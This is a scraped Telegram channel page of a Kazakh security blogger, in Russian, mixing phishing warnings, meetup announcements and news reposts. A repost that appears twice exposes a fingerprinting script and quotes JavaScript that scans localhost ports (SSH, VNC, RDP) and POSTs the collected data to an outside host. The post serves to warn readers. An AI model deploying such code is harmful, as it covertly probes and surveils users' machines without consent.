en
Feedback
MEDET TURIN

MEDET TURIN

Open in Telegram

Эта страница создана чтобы делиться своими наблюдениями в интернете. Сарказм и юморочег тоже присутствует. А еще это мой твиттер на максималках. Фоллоу ми он instagram: @2600kz

Show more
904
Subscribers
No data24 hours
+57 days
+730 days
Posts Archive
Не так давно съездил в Узбекистан, а там свой citizensec появился 😂.
Не так давно съездил в Узбекистан, а там свой citizensec появился 😂.

Repost from SecuriXy.kz
Кто-то (HH) начитался про сбор данных от гугла и фейсбуков и решил пойти дальше сканируя людей и их окружение и активы. https
+1
Кто-то (HH) начитался про сбор данных от гугла и фейсбуков и решил пойти дальше сканируя людей и их окружение и активы. https://qna.habr.com/q/465498 https://x.com/nightlind/status/911806158230495232 Вот скрипт: https://jsfiddle.net/Lknb3xez/ Снимается WebGL fingerprint. Проверяются доступные шрифты, плагины браузера. Снимается: 1 Часовой пояс 2 Локализация (язык) 3 Характеристики видеокарты и CPU 4 Параметры экрана, доступность WebRTC 5 Пробует подключиться к localhost на разных портах:
127.0.0.1:22 (SSH)
127.0.0.1:5900 (VNC)
127.0.0.1:3389 (RDP)
127.0.0.1:80, 5000, 8080
и др.

let portsToScan = [22, 5900, 3389, 5000, 8080];
portsToScan.forEach(port => {
    let img = new Image();
    img.onload = () => {
        reportOpenPort(port);
    };
    img.onerror = () => {};
    img.src = http://127.0.0.1:${port};
});
Отправка собранных данных
fetch('https://example-hh.ru-backend.com/collect', {
    method: 'POST',
    body: JSON.stringify(collectedData)
});

Скрипт не всегда активен: Определяет тип устройства, локацию, поведение пользователя (например, неактивен в режиме инкогнито или под VPN). Внедряется по вероятности или под определённые сценарии. Совет один - Не открывайте доступ браузеру никуда…

Repost from SecuriXy.kz
Кто-то (HH) начитался про сбор данных от гугла и фейсбуков и решил пойти дальше сканируя людей и их окружение и активы. https
+1
Кто-то (HH) начитался про сбор данных от гугла и фейсбуков и решил пойти дальше сканируя людей и их окружение и активы. https://qna.habr.com/q/465498 https://x.com/nightlind/status/911806158230495232 Вот скрипт: https://jsfiddle.net/Lknb3xez/ Снимается WebGL fingerprint. Проверяются доступные шрифты, плагины браузера. Снимается: 1 Часовой пояс 2 Локализация (язык) 3 Характеристики видеокарты и CPU 4 Параметры экрана, доступность WebRTC 5 Пробует подключиться к localhost на разных портах: 127.0.0.1:22 (SSH) 127.0.0.1:5900 (VNC) 127.0.0.1:3389 (RDP) 127.0.0.1:80, 5000, 8080 и др. ``` let portsToScan = [22, 5900, 3389, 5000, 8080]; portsToScan.forEach(port => { let img = new Image(); img.onload = () => { reportOpenPort(port); }; img.onerror = () => {}; img.src = http://127.0.0.1:${port}; }); Отправка собранных данных fetch('https://example-hh.ru-backend.com/collect', { method: 'POST', body: JSON.stringify(collectedData) }); ``` Скрипт не всегда активен: Определяет тип устройства, локацию, поведение пользователя (например, неактивен в режиме инкогнито или под VPN). Внедряется по вероятности или под определённые сценарии. Совет один - Не открывайте доступ браузеру никуда…

Сидя в отеле Ташкента, читаю лекцию для любимого Уральска. Прелести удаленки. 😅 Проводим все через zoom, безопасность которо
Сидя в отеле Ташкента, читаю лекцию для любимого Уральска. Прелести удаленки. 😅 Проводим все через zoom, безопасность которой я тоже затрагиваю в презентации. А вообще, я надеюсь, что это моя крайняя лекция по этой презе. Новый материал и новый контент, получат только Актау и Семей. Эксклюзивно, офлайн. Так, что готовьтесь к моему визиту 🤪. Для остальных мы приготовили «закрытый курс», который естественно бесплатный, и на нашем портале, но будет доступен только для госиков 😇.

Repost from N/a
👾RTEAM Bug Bounty – Pre-Registration Open! 🚀 We are launching a new bug bounty platform and inviting security researchers t
👾RTEAM Bug Bounty – Pre-Registration Open! 🚀 We are launching a new bug bounty platform and inviting security researchers to sign up early. Be among the first to access the platform, hunt for vulnerabilities, and earn rewards! 🔐 Why pre-register? ✅ Get early access when the platform goes live ✅ Be the first to know about the launch and rewards ✅ Join an exclusive community of top bug hunters 🔥 Bug hunters, sign up now! 🔗 https://rteam.kz/bugbounty 📌 For companies: Looking to strengthen your cybersecurity? Connect with us! ✉️ office@rteam.kz 🌍 rteam.kz #RTEAM #BugBounty #CyberSecurity #EthicalHacking #CTF #Netrunner

Привет, чат! Мне нужен UI/UX дизайнер в команду citizensec.kz. Очень много внутрянки надо нарисовать. ГПХ, работа в офисе, много всяких приколюх, все дела. Если хочешь чтобы твой дизайн увидела вся страна, гоу в лобби, я создал. P.S. А еще будем рисовать спецрепортажи, как adult swim. Будет весело. Напиши мне.

Repost from 2600 Qazaqstan
Хей-хей🔔 🔜Напоминаем вам что 2600 уже завтра! 📍Время и место проведения: 20:30 Chili Grill https://2gis.kz/astana/geo/70000001023400274 P.S Like, Share, Hack!🔈

Repost from 2600 Qazaqstan
Хей-хей👋 🔥 2600 совместо с хакерспейсом "Черный Лед" возвращается в феврале! 🔥 🔈 Готовимся к встрече хакеров и энтузиастов ИБ! 🎤 Вас ждут 3  доклада: 📎Seen It All: Исследование о обнаружении атак на сети Windows на основе анализа сетевого трафика От: @casterbyte 📎 100 лет: Bell Labs От: @novitoll 📎Эксплуатация PostgreSQL: RCE через Large Objects и .so библиотеки От: @its_not_my 📍Дата и место проведения: 6 февраля в 20:30 Астана, Chili Grill https://2gis.kz/astana/geo/70000001023400274 P.S. Like, Share, Hack! ✨

Repost from Aqorda 🇰🇿
⚡️Касым-Жомарт Токаев: «Понятно, что тотальная цифровизация значительно упрощает взаимодействие государства с гражданами и бизнесом, минимизирует бюрократию и коррупционные риски. Однако обратной стороной этого процесса является увеличение фактов мошенничества. Все чаще мы сталкиваемся со случаями дезинформации и медиавбросами, направленными на манипуляцию общественным мнением, дискредитацию власти, разжигание розни. Это создает серьезные риски для безопасности граждан и стабильности в стране. Поэтому необходимо рассмотреть вопрос законодательного закрепления ответственности интернет-платформ за распространение деструктивного контента. Но укрепление кибербезопасности ни в коем случае не должно замедлить процесс цифровизации. В обществе складывается мнение, что усилия государства по защите граждан от кибермошенников недостаточны. Статистика показывает негативную динамику: ежегодно регистрируется свыше 20 тысяч случаев интернет-мошенничеств, из которых около 80% остаются нераскрытыми. Поэтому Правительству совместно с правоохранительными органами и финансовыми регуляторами надо обеспечить максимальную защиту персональных данных граждан» t.me/aqorda_resmi

Всем салем! По ситуации «2600 Астана» в феврале. Короче локация подвела. Сейчас экстренно в поисках где провести сие мероприятие. Очень крутые спикеры и доклады готовы, а вот место проведения необходимо организовать. Если у вас есть такое место/заведение, напишите в личку @NWNC0. 7 февраля надо провести.

Гоу в феврале 2600 Астана?

Вчера посмотрел докфильм. Зацепило, что кейсы рассказывают сами жертвы. Рекомендую к ознакомлению. https://youtu.be/zottrhduaJw?feature=shared

Как посмотреть записи с камер Сергек? Если вам пришел штраф за нарушение ПДД, то можно просмотреть не только протокол, но и фото/видео с камер Сергек. Вот путь: заходите на сайт qamqor.gov.kz → Обжалование административных правонарушений → Авторизуетесь в личном кабинете по ЭЦП → Ваши административные правонарушения. Далее нажмите на значок документа в правой части экрана и затем на "Просмотреть фото-видео" (понадобится подпись через ЭЦП). Ваша заявка будет в обработке и через пару минут отобразятся доступные медиафайлы. Автор ролика показал, как это делается. https://t.me/podeshevlekz

Хей хей! Всех с праздником! Хочу поблагодарить каждого из вас за то, что вы со мной. Пусть 2025 год для вас будет наполнен яркими событиями, принесет много побед, а главное будет успешным! Берегите себя и своих близких. Оставайтесь в безопасности 🙂

Короче такое придет, жмете кнопочку «пожаловаться». Не суйте свои коды, пароли и пальцы куда не надо.
Короче такое придет, жмете кнопочку «пожаловаться». Не суйте свои коды, пароли и пальцы куда не надо.

Хей хей! Хотите подарочек на Новый год в виде подписки на Telegram Premium для всех моих читателей? Активировать.Фишинг по-прежнему не теряет своей актуальности. На этот раз скамеры решили сыграть на новогоднем настроении и массово рассылают “подарки” для доверчивых пользователей в виде годовой подписки на Telegram Premium. Переходя по ссылке, жертва сталкивается с предложением ввести данные для входа в аккаунт и код подтверждения. После этого на сайте запускается таймер на 24 часа, якобы необходимых для “активации подарка”. Пока пользователь ждет заветной премиум-подписки, его аккаунт успешно угоняется и затем либо продается, либо используется в других мошеннических схемах, при этом попутно рассылая дальше по контакт листу жертвы этот «подарок». Будьте внимательны: настоящие подарки не требуют ваших данных для входа! Схема не новая, в прошлом году под НГ она уже была. Но вот опять…

Repost from 112 KZ
⚡️Справочная информация по крушению самолета На данный час госпитализированы 29 человек, из них 2 детей. В настоящее время продолжаются аварийно-спасательные работы. В Командном центре г. Астаны и в ДЧС Мангистауской области функционируют телефоны горячих линий, где поступило 296 звонков. Списки погибших и пострадавших уточняются. В г. Актау прибыл министр по чрезвычайным ситуациям Республики Азербайджан генерал-полковник Кямаладдин Фаттах оглы Гейдаров. @emergovkz / t.me / insta / tiktok / youtube